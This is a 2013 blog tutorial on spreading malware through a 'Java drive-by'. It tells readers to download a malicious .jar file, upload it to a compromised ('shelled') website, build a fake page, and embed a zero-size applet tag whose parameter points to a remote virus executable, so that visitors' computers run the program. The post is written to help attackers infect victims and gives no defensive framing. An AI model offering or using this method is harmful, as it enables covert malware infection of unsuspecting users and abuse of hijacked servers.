Sunday, 15 September 2013

How Hackers Spread Malware With Java Drive by?


We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff.  But cheers up my friend there's no end, i will show you a very effective methods that attackers use to spread malicious viruses/worms.

Well In this tutorial We will show you to spread virus with JAVA DRIVE BY!

What is java drive by:

A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. 

Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job. 

Tools we need in this game are:

i) a .jar file which is the main player of this game. Download it from here http://www.mediafire.com/?mmafl2carb1s159 
ii) A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page. 
iii) A java script which is the backbone of your game. 

Now lets get started, Upload you .jar file on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear 

Java Code: 

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe"> 


So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus 

 So this is it! Simplest and most effective method used by attackers to spread your malicious software.

No comments:

Post a Comment